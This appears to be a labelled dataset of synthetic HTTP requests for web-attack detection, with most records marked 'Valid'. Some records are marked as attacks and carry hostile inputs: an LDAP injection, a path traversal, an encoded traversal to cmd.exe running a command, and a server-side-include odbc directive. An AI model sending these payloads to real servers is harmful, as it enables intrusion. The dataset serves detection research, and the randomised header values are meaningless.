Date: Tue, 15 May 07 22:24:15 CET
ETag: "z4OaVbtI6PaeC@x1_8Wl"
Expect: nk6R7e
From: htCtf@mttsOtlOi.org
If-Modified-Since: Thu, 06 Jan 05 02:49:42 UTC
If-Unmodified-Since: Sun, 01 Mar 09 05:15:04 GMT
If-Match: *
If-None-Match: "nhXAWvw4yBSKBH@Tos@I"
If-Range: Wed, 03 Aug 05 15:45:30 GMT
Max-Forwards: 536
MIME-Version: 2.9
Pragma: 12r=iia0
Proxy-Authorization: NTLM ZU5SdHQ2cmxtZHRERWVFZWViYXI1QUluYVAxSmhvZW1JMGd0
Authorization: NTLM aG95YXhjcjBlZTN0bHdkVGVlaWxyaXNkbXJ3bzNoc1J1YnR1TzdwYw==
Range: 97-403959,415744-,056-023107
Referer: http://h8qugyH.org/n2acciX.zip
TE: chunked;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 6.8; ir-0U; rv:3.8.5) Gecko/30892822
UA-CPU: MIPS
UA-Disp: 3911,9683,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1822x173
Via: HTTP/7.6 www.1eajJ.tiff:9002, FTP/8.7 167.232.148.133, 5.5 www.g2leuhf.css
Transfer-Encoding: compress
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 515 www.vdEcm.shtml:048 "6na16YAmltecfI" 
X-Forwarded-For: 227.202.246.94
X-Serial-Number: 122676633400970
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22506
Start - Id: 38636
class: LdapInjection
GET /rea/esms/wPcIAnBUs/len/k@X/tymeggfFauszbnHC/iHTPHTZ.pTaGEU@uvXd/0iingwesocoR.sh?b7Wdetsc53Ra=5706%29%28%26%28objectClass%3Dnoey%29%28%7C%28sn+%3Dity%29%28cn%3Dea++J*%29%29&tig=sUR8&openYNr=70068&eeinn=1onnetcat HTTP/1.1
Host: 93.216.193.243
Connection: close
Accept: text/html;q=0.9, application/*;q=0.6, text/plain
Accept-Charset: euc-tw;q=0.4
Accept-Encoding: deflate;q=0.6, gzip, identity;q=0.4
Accept-Language: tahe5unw-uheeaP, i3dmin7-2;q=0.6, tree-ngeseaq
Cache-Control: only-if-cached
Client-ip: 67.220.53.91
Cookie: eo0o=servicesisouspnvld>c 0a;ftTrcdph2rben=nlneipasswd&FaLBr i;ab3hewO36=mOynld0;mstjsbestm=mijtNpneegubnl1
Cookie2: $Version="732"
Date: Wed, 29 Aug 07 04:37:04 CET
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: tn0thejR@aoGrudsiow.st
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Thu, 05 Feb 04 24:00:06 GMT
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.0
Pragma: rverote='psa'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 25834-,48-325537
Referer: http://1Tos3.biz/etoh/saeeaaep/drlilfb/enoi8t.tiff
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: o19FEIu http://www.eiLbwCgi.st
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 601x4009
Via: HTTP/7.0 19.18.247.233
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 873 www.crqmw.shtml "oisUjyPexehaoceb" "Mon, 12 Nov 07 06:17:25 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 3254523964
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38636
Start - Id: 22892
class: Valid
GET /tltn1iI/lrto7yss1HWe/h024xd4EzyrpDjo/ayeaMm3t/gyYw2ixeEioseenoeohA/dOjPxXuHAa9IeksyAU/wln3leeEbcteeaoo/Ti/cntnt/m1/hrsjiaAlaehh.gif?oo1kire=315&onse5pbereOta=4Rkeioia0x4ooiw&m96erNjasaxarei=wacahomol+&htrtaVnHaipo=%5Be1nr%3Fhplwgpassthruy&E3uZrNqY4_b=25167090 HTTP/1.1
Host: www.lebn3t.st
Connection: close
Accept: audio/x-wav, application/rtf
Accept-Charset: iso-2022-kr;q=0.2, iso-8859-8, iso-8859-1, iso-8859-5;q=0.1, iso-2022-jp;q=0.3
Accept-Encoding: compress;q=0.6, deflate
Accept-Language: *
Cache-Control: max-stale=546
Client-ip: 250.14.63.166
Cookie: uhoahmgSDeuyq=9rsowiiu;weDy06adhtjhi= eser;ssdfs2kEmsetns=cyehstyle;lsiexeccsYeT=cgJYHXynQP.b
Cookie2: $Version="704"
Date: Wed, 11 May 05 17:48:35 CET
ETag: W/"ME6FG0_9uGnLRWBoQDlI"
Expect: iJtimzhi=hitI;rowi=aoetnpn
From: aseiiog@zr5aou.org
If-Modified-Since: Thu, 06 Aug 09 19:59:52 UTC
If-Unmodified-Since: Fri, 15 Apr 05 16:06:16 CET
If-Match: "V4h95rkLbI2AKF@"
If-None-Match: "RnxSMKBF2VygWcWzy"
If-Range: Wed, 26 Jul 06 08:45:48 CET
Max-Forwards: 7213
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Digest realm
Range: 37032-5753,-977
Referer: /otilis/6isddVa/sdSI/rcif1eo.doc
TE: trailers,chunked;q=0.3,deflate;q=0.2
Trailer: Trailer
User-Agent: 4sYbtgLo
UA-CPU: MIPS
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: 5.0 38.95.217.2, HTTP/1.1 www.l2ethouh.js:634
Transfer-Encoding: deflate
Upgrade: enatdd/2.0, rmbvnI/8.6
Warning: 186 www.oodtiw.shtml "0e81oio" "Wed, 24 Jun 09 07:13:01 GMT"
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22892
Start - Id: 12564
class: Valid
GET /Kwp-AhNDY9D/ovn8AuG0x3SEVSPHhS..pl?hlA=pttvbscript&inneinwrg=2 HTTP/1.1
Host: 33.98.194.35
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1258;q=0.0, us-ascii;q=0.2
Accept-Encoding: *
Accept-Language: ejeremdn-oddm;q=0.2, 7het9rs-rliEotat;q=0.4, etixCdgT-alhd16a
Cache-Control: no-store
Client-ip: 250.98.12.167
Cookie: uthke=D;nEehpfo=Nl;aalgeadcuIiYa=67549180;oahgtc=@http=OhxelATchildral
Cookie2: $Version="29"
Date: Mon, 26 Apr 04 05:14:57 GMT
ETag: W/"yrlDJs1oar.qn35"
Expect: Eennb9=nlus9;rtae=thjceles
From: dS1i@dHcupdftec.biz
If-Modified-Since: Sat, 31 Jan 04 10:54:01 CET
If-Unmodified-Since: Sat, 02 May 09 03:38:12 UTC
If-Match: "FEEK2hhyjptzTSsv7"
If-None-Match: *
If-Range: Fri, 03 Oct 08 11:05:13 UTC
Max-Forwards: 6630
MIME-Version: 8.2
Pragma: ie=nf
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: NTLM ZUxtZ3NpdE1lZmVkZXNhMkVTaW1laUVzaGgzdmFpbmx2aGlzZ2M=
Range: 941-,7-5
Referer: /67eEmr/5htnla/tzoc.msf
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.4 (Windows; U; WinNT 6.9; tR-SZ; rv:4.9.5) Gecko/43504918
UA-CPU: 68000
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 366x415
Via: HTTP/5.1 43.29.54.205
Transfer-Encoding: drrlh
Upgrade: a1e0oe/8.1, dhoae/6.1
Warning: 299 www.sebroiht.htm "eaob" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12564
Start - Id: 45177
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: 193.50.143.158
Connection: close
Accept: */*
Accept-Charset: shift_jis, iso-8859-6;q=0.4, windows-1258, euc-tw
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 35.207.4.140
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Mon, 03 May 04 22:54:01 UTC
ETag: W/"Q9YT7f22enb@zJ0p.VT3"
Expect: neaaOnc=ioroca
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Mon, 30 Oct 06 19:14:13 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 847
MIME-Version: 0.7
Pragma: lfiEn=lwe
Proxy-Authorization: Digest nonce
Authorization: Digest nc=9B7EA0Cc
Range: 551-3881,-846
Referer: /nw8al.js
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 9.7; ia-ee; rv:3.9.7) Gecko/75943411
UA-CPU: StrongARM
UA-Disp: 133,5622,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1177x8327
Via: 6.7 www.gdsQ8oo.png, 0.0 www.ka5eeize.html:4
Transfer-Encoding: identity
Upgrade: 09T/5.5
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 129.187.101.194
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45177
Start - Id: 9244
class: Valid
GET /vfiRdVITdI/aSitataRmi.gif?noetRaLladLyetl=Cn-iohaq&ieotdebi=o5insert&lgCs6Nirytzi=an9%3B&ai2oiksohWRTtl=tmH%5D&ge=co+&yyidhsrea9siRe4=gZMJ7M&Aaaabl=3664&iet=co+bodyqdeM6pg%5Ca&tsn0=srofEi&egsrrlwalKa=52472&eest=06532&ndidtwr8eRdes=s2dOtc8Q4Xf5&owiix=s+nai%5CInoejoOb&ipe7m=baPzb&j22rdninao=nZEG3%40Bi4VOe HTTP/1.1
Host: www.sliemoatla.biz:80
Connection: keep-alive
Accept: audio/basic;q=0.3, application/rtf;q=0.4, text/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: iod7-N;q=0.3, ea1lo-nsbahh, 83ddgt4W-yr
Cache-Control: no-cache
Client-ip: 88.33.132.5
Cookie: o1=cBsnph-aoRsiy;ahntoNuiiaLei=mJhE;ithtrie=22255401;A4tr5=890;lw9orfwt5i8bt=sut;2botpsseda3ofA=ptfgcwmdhcsoO
Cookie2: $Version="17"
Date: Mon, 16 Jan 06 16:57:49 CET
ETag: "lC2c3zVTXTW@QzaDI"
Expect: 6yez
From: dreQEL@4sied6c.gov
If-Modified-Since: Sun, 11 Nov 07 06:00:48 CET
If-Unmodified-Since: Mon, 16 Aug 04 05:29:32 GMT
If-Match: "C.oB.rqOSYSlLLBt@b"
If-None-Match: *
If-Range: *
Max-Forwards: 914
MIME-Version: 2.4
Pragma: 02mmn3da=o
Proxy-Authorization: NTLM ZWlNc2xhWmYxRTJ0ZXJ5T25zeUVvc3RsaTZxcnJobjg2b2lnZWty
Authorization: NTLM cHJlaXBwSG9pTjY2cjljbmhhZWk0SWVueWVlU2xlVTh1MmluZ2E0aGk=
Range: 7-,506-547400,2408-38770
Referer: /1Op5r/afcss/aRehc/auhn.jpeg
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 4.2; ns-nr; rv:8.9.5) Gecko/45966512
UA-CPU: Sparc
UA-Disp: 2373,285,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 476x394
Via: 4.1 www.dynmvn0m.js:9921
Transfer-Encoding: compress
Upgrade: dOaas/3.7
Warning: 214 149.148.244.123 "nrssahmgn6i" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 1183093668274031792
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9244
Start - Id: 10694
class: Valid
GET /eyhdhotoerneatdszYgz/wxW3nsfs2hrR/GbFwMce/hkCRS9zwhjRSPglD.mspx?jY3OV9zW1E4=odroponn0U%5Djayvog2&Nr8uleJ1=anT6&hsfslnIto=varrsobjectr&Lol8=6&7t7Ep6Eeaabe=aIoy&rriymygqge65en=men8&w9=r8&shbhdhc1W=2tmp%3Ab HTTP/1.1
Host: www.ekAlaISt.uk
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-hebrew, us-ascii, windows-1255;q=0.9, x-mac-arabic;q=0.8
Accept-Encoding: gzip;q=0.1, gzip, deflate;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 245.69.51.123
Cookie: bsthcu=ixtermwitrraitofMfe;u0mde9eN=67057;navalauaMe6t=7015168;5v37setqhemaPn=191;6thTexn=je4ktlcwamOeze;seaxoedteErc=193786
Cookie2: $Version="845"
Date: Wed, 26 Aug 09 18:33:21 UTC
ETag: "NsmVkiQ23C9NTA@.zmx9"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Fri, 28 Mar 08 05:21:05 GMT
If-Unmodified-Since: Sat, 18 Aug 07 20:34:05 UTC
If-Match: *
If-None-Match: "K-2phcN5XOsORF985yFN"
If-Range: *
Max-Forwards: 4
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: NTLM bnc2b2x0YU5hc2hubnRnbnRsdE90b2RoNHJzbG9vZWJ6dzJh
Range: 569080-9470,36135-,7-
Referer: http://www.07ona.net/Nkwao7I/eEPel/agctl6en.bin
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/2.4 (X11; U; Linux i386 4.0; oy-Nd; rv:9.5.1) Gecko/79561575
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 265x4245
Via: FTP/4.0 www.athwm.png, 8.4 64.71.109.121, HTTP/4.6 145.2.126.34
Transfer-Encoding: gzip
Upgrade: zjyco/2.1, aimb/3.0
Warning: 570 www.ilst.tiff "wuni9is1t9" 
X-Forwarded-For: 87.119.214.253
X-Serial-Number: 359062356
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10694
Start - Id: 25653
class: Valid
GET /ddiv/MrztNdeleteKDuetcXuEZ9/8dg/rndn8eYhfs/oo8sONW3fB_K@dUfESx/ag/5A6QDcUUYc5s/esctJbCET-L_IU1H/ateefimictfrf.mspx?oH8K@Rfpu=-+N&OiO3gne3y=nTUIup.Bv8iV&ytih2ao=e3aBrsm%27tn&u1ml5wescnid=cmdthsetda+1bom1&5DsmTnnxsne=%25+rexec&ni4efo=a2scriptsltrmye&wtt19onbeaahd7m=in&eaeae1oOeLu=+nbek&ilklioeh0iedgi=7sc&7eanxdodce9=1540&i4CeeteOpeexd=0590&a0tto=R4rsf++lrp9tdn&shutws=icmochattiyd&wMat7sa7wieTrbt=te9varsiadum%5D&7o.@M=sbedOeasln HTTP/1.1
Host: 254.242.148.140:3781
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.1
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 163.112.170.136
Cookie: ee9OerRetZ=t;8 ;aznph-HLNVD=hyi$b;;an5thsfo37iso=ehl;eun6lohtyotystf=ottn;tykrEeomt=eteXFw0OGc;GKMVh9nmEB4=05861
Cookie2: $Version="0"
Date: Sat, 07 Feb 04 04:53:34 CET
ETag: W/"7eTfVhdTQmnM5XVe75"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 04 Apr 10 06:09:17 GMT
If-Unmodified-Since: Mon, 27 Aug 07 22:29:13 GMT
If-Match: *
If-None-Match: "d1ajbSW0_bYl.eJ"
If-Range: Sat, 18 Apr 09 04:20:06 GMT
Max-Forwards: 60
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: -55
Referer: http://www.cndji.be/nuootR.exe
TE: trailers
Trailer: Range
User-Agent: vraaaljo
UA-CPU: 68000
UA-Disp: 349,527,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: HTTP/8.2 39.3.163.68
Transfer-Encoding: gzip
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 849 www.a80e.jpeg:2725 "efl1xbzhwbe" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25653
Start - Id: 13142
class: Valid
GET /uxiM0QxKiDvZEGEltvkd/doabnebstlTmtn/QZHVunion.tiff?Q5ndF_p=m&n8CKQacceptXrcp0k=no5-1qn1Z&nmae6=n&tr=tZEcLZ0&ms8tlrrhiHW=e_CxlE&siqse1n4oe=8816&i0cPe=%5Bebiq%3Fth%2Fpe&sbqHoagaa5=6&dosellntHa4s=77221467&eucrmhL3=hUMYz.tc HTTP/1.0
Host: 141.81.163.40
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: ohho=8X
Client-ip: 146.86.114.200
Cookie: YiinsertjQI=oh_doo9I;thoHogncao=hst6n
Cookie2: $Version="5"
Date: Sun, 18 Sep 05 04:49:20 CET
ETag: W/".mGwPDwpBjzYt2m7"
Expect: e2sht=aoay;rsey6i=paia
From: rBs84eg@im6v.st
If-Modified-Since: Fri, 15 Oct 04 10:41:01 GMT
If-Unmodified-Since: Tue, 30 Nov 04 21:18:45 GMT
If-Match: "Ub1FuAvZEPgKylUm"
If-None-Match: *
If-Range: Sun, 06 May 07 17:30:33 UTC
Max-Forwards: 94
MIME-Version: 0.8
Pragma: qb=r
Proxy-Authorization: NTLM bXYxb2VmZHZpb3Roc0VoaXJoaWE3ZGthZU9laWF0dHlwbG85cGg=
Authorization: Basic YWxjbk5tOGM6dGZud2hobWg=
Range: -22,686-,439169-
Referer: http://reypoo.ch/xrataaar/mkEh/Thfoeh/kfnzo4a.nsf
TE: deflate,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/0.1 (X11; U; Linux i386 4.0; sm-ji; rv:0.0.6) Gecko/64514329
UA-CPU: Sparc
UA-Disp: 806,0738,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 357x4645
Via: 8.3 www.oscmtn.jpeg, 5.8 www.b1qcni.css
Transfer-Encoding: identity
Upgrade: ieri/8.8, fihXea/0.2, pcuC/3.5
Warning: 895 www.etea.html "eEseI" "Mon, 03 Mar 08 14:51:32 GMT"
X-Forwarded-For: 141.250.177.130
X-Serial-Number: 193112080
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13142
Start - Id: 23202
class: Valid
GET /1uyoup.RpA/ahvYrpEY3THT/ozi5dh4huzHlot/dg4r/ahsRdetu3l/nM4308X/5onzhiardtnAta9nhya/9oqvarlbgsoundKyAh/yG.jpg?utrabvuenyjsdl=ia.usZy33%40&oa=DMcO7rrsUaebmwMo&akp7ffwate=964132&eDsncuoedisn=76&okKoltiio=4412&GnCjsJ8hhx-=dtbgsound%27atpsi7slu+&uefehyknedodt=oieo&eyeEdsfL=d+weestsmp&OoeEnseo5uz=t7s%3Elibneoy&odot=7&etesihrohl=eqcH+shutdown+eh+8 HTTP/1.1
Host: www.awns.fr
Connection: xrn5tl
Accept: image/jpeg;q=0.8, text/html
Accept-Charset: x-mac-chinesetrad;q=0.8, x-mac-icelandic;q=0.4
Accept-Encoding: *
Accept-Language: sataro-ye;q=0.5, hjue-ar
Cache-Control: min-fresh=394
Client-ip: 25.69.134.247
Cookie: fUsL1hEOapeeLsa=isxHiapwmeen
Cookie2: $Version="6"
Date: Sat, 11 Aug 07 14:00:31 CET
ETag: "YdyrKUwo87rU1DAeu"
Expect: slaFp=dehidse;utow=bdcizeMd
From: yEynS@yostnHon.org
If-Modified-Since: Thu, 07 Jun 07 14:07:18 UTC
If-Unmodified-Since: Sun, 06 Sep 09 08:53:47 UTC
If-Match: *
If-None-Match: *
If-Range: "YFT0hmOs6jIEyU0n"
Max-Forwards: 8
MIME-Version: 0.2
Pragma: aI=eh
Proxy-Authorization: Digest realm
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: -23
Referer: http://www.Lwjidls.st/2akhw/blohehd/i5dteg/iouwx/eysbe.cfm
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 4.8; qL-cn; rv:9.8.0) Gecko/22457857
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: FTP/2.9 www.osljn.css, HTTP/8.7 2.184.171.184:6062, 6.5 216.5.70.196
Transfer-Encoding: identity
Upgrade: enbe/7.1, 5nea/2.6, bie0n/5.7, ueru/7.3
Warning: 740 67.56.178.182:495 "aadiohcwejjhwee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23202
Start - Id: 43975
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 153.223.48.168
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.5, identity, identity, gzip;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 9.225.171.68
Cookie: 5f6IlAr=3;t1kAXZiZKgroup byKS=positionnhtacces8Rsrf;hRiozUa=eaa8
Cookie2: $Version="45"
Date: Thu, 27 Apr 06 11:59:41 CET
ETag: W/".M73M1s.vEWh-qdTs"
Expect: 100-continue
From: axenii@lMdner.de
If-Modified-Since: Fri, 23 Sep 05 06:40:53 GMT
If-Unmodified-Since: Sat, 01 May 04 17:53:50 CET
If-Match: *
If-None-Match: "nghSSiXZqI6yCGLjsR.n"
If-Range: Wed, 23 Dec 09 19:36:38 GMT
Max-Forwards: 1
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: NTLM cGFtd3RvYWNIdXJzc2RlemRhbmttaTRjdW1OaW8yaHk=
Range: 2873-08
Referer: http://thfa.be/Sex4/Osxnet/TeOiec5n.doc
TE: trailers
Trailer: Referer
User-Agent: Mozilla/0.3 (Windows; U; Windows NT 2.0; rw-go; rv:6.0.6) Gecko/16969700
UA-CPU: x86
UA-Disp: 3500,2136,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 2346x026
Via: odna/0.5 www.llklra35.gif, htiw/3.3 www.iygyyfy.jpg:426
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43975
Start - Id: 40732
class: SSI
GET /Nicu/easos9lh3l/psvSKMGFJ9jpasswd-FL/rjabubn5jYAoTzhuC/_K5fDN8j@W9IK3g/AU4vYsock_streamyJGEEE@/e8rGGL/8qt1ohasb/tkPO4B28bMmQHRuGE5B/0oaSeeni5ng/Mgd5orNuI0Z7/9admin@1iirFP.php3?teeqnayetrh=ioeA%29mhrt%5B%289h&o3eo8h8=5094045&mmi6NeneR=%3Aeunion&1dssl3=h&iee=dmicttkNelo&thcahutpe=tadminure0linkaddeletetem%5C&inewqhhyha4eewq=ur&K8cdwindow.openO=%244+trctsxwiu%7Eim+i&erarticueii=DnsyxFFoeott2pT&rorhNoy=4eRvekn7tor HTTP/1.1
Host: 247.240.255.212
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: iso-8859-8-i;q=0.1
Accept-Encoding: <!--  #odbc  connect="btennas,aecss1,d9r"        statement="select *    from  d"-->
Accept-Language: duetop-O8aw;q=0.3, g1-Umede, otie2o0e-2shlO5mP;q=0.6, l9dm-hnj3, udhtod1-e;q=0.6
Cache-Control: no-transform
Client-ip: 107.167.112.171
Cookie: kIt5su=i@;nnHqOwenAl=stdin;qc3lbrgcroW=q@m
Cookie2: $Version="64"
Date: Sun, 29 Oct 06 19:26:51 GMT
Expect: 100-continue
From: gRilt@RM7e.biz
If-Unmodified-Since: Thu, 09 Nov 06 10:18:36 GMT
If-Match: *
If-None-Match: "jc6emouYQ14ktmVQpM_x"
If-Range: Thu, 08 Apr 10 10:13:09 GMT
Max-Forwards: 79
Pragma: sSley04c=i3
Proxy-Authorization: Digest qop=epWbboe
Authorization: Basic c1V0eVc6ZW5UYXNz
Range: -78
Referer: http://Ailnasns.biz/uiexeN/sIc8o1u/ne76.wmn
TE: chunked;q=0.9,gzip;q=0.6,trailers
User-Agent: tetjoifrsnortp9M
UA-OS: Windows 95
UA-Pixels: 999x143
Via: 8.5 www.lierans.htm, HTTP/9.6 216.1.194.104, 0.7 www.te0uhn.html
Transfer-Encoding: yartel; tLci2=ienrCYnh
X-Forwarded-For: 168.72.228.20
----: ----------------------

null

End - Id: 40732
Start - Id: 24631
class: Valid
GET /mroexATrs/passwdbHXkjRRX/rVbN6/ehttsze8xiyezvb.php3?nc=+object&iunxyet=t6i&As=%3DH%3F&eDeat=125458065&o5ntC=meevalrwp-&rn@MoKDsTvSJ=809&rIse4naatrgegyi=079&wdiahxewbhIei=ndss0x5&alOvd=aeuer&ei4UnAoi=991 HTTP/1.0
Host: 116.33.32.74
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic, cp-936;q=0.5, iso-8859-4;q=0.3, hz-gb-2312;q=0.6
Accept-Encoding: gzip;q=0.5, gzip;q=0.8, identity, gzip;q=0.8, identity
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 201.121.226.242
Cookie: ttcrhri17eo9=Wtnw;thseudv=65357;dtef3fbywJaxnh=14431;rP.l4enGP=itaaca9burpWoqeUck;beeSrtrmbrg=yTla8Inlbauot
Cookie2: $Version="217"
Date: Fri, 08 Dec 06 02:11:13 UTC
ETag: W/"R42UaEF-6rwLFouHVz"
Expect: tch3xs0
From: utgowu@dmbui.org
If-Modified-Since: Fri, 28 Jan 05 18:26:46 CET
If-Unmodified-Since: Fri, 29 Feb 08 13:06:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 117
MIME-Version: 6.7
Pragma: eNi1eush='Gunseay3'
Proxy-Authorization: Aetu wn0njq5x=zlf8l
Authorization: ce8s ljdtlikm=nwiSses
Range: -543,-70
Referer: http://www.k4die6.it/51hhi.swf
TE: deflate,trailers
Trailer: Accept-Encoding
User-Agent: enehegep0n/5.4
UA-CPU: StrongARM
UA-Disp: 7015,359,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4560x959
Via: 0iO/1.9 www.frjaeaa.htm, 7.2 60.126.220.46, HTTP/8.7 www.dm2sst.jpeg:8
Transfer-Encoding: gzip
Upgrade: udg/0.5, ulmirt/6.0, 5guTu/1.8
Warning: 846 www.iihrevae.gif "eaehIhsswntnhuios8" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24631
Start - Id: 3148
class: Valid
GET /ss/@divpexec0VlRmybinsertXj.cfm?lSdpk=aDo&eA=scripte%5Coo&nehewy=+e HTTP/1.1
Host: www.anbleiaa.be
Connection: frNe
Accept: audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: atlh-dwb;q=0.9, nviutEaE-epeeao;q=0.9
Cache-Control: no-cache
Client-ip: 47.186.204.219
Cookie: udeleteO0m=451984;apnbxuaEen8eo5e=88;mInbxf6la1i8w=2234209;rGqsmoteaxapn=r9dto;retseneohni5tnt=ne5u6;9henihhbiesp=[kn t
Cookie2: $Version="69"
Date: Sat, 22 Jan 05 10:20:24 GMT
ETag: "-AJ3BvKDQiLoGn3w"
Expect: itcgr
From: dr3e@eJNrt.cz
If-Modified-Since: Tue, 24 Feb 09 11:56:31 CET
If-Unmodified-Since: Mon, 11 Oct 04 17:42:48 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Mar 06 04:46:03 GMT
Max-Forwards: 65
MIME-Version: 5.6
Pragma: Erd='nlnu'
Proxy-Authorization: soe8zt sjRmiek=rtuiiair
Authorization: NTLM ZWhucm1jbWNpbm9hcm9ob25jb3VobG53ZWhTM2dlTHVo
Range: -82153
Referer: http://www.sn4rhost.cz/e3rcyZd.php4
TE: trailers
Trailer: Date
User-Agent: orj4n/7.7
UA-CPU: PowerPC
UA-Disp: 245,4881,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5717x5114
Via: 5.7 86.102.251.245
Transfer-Encoding: identity
Upgrade: ianerr/8.5
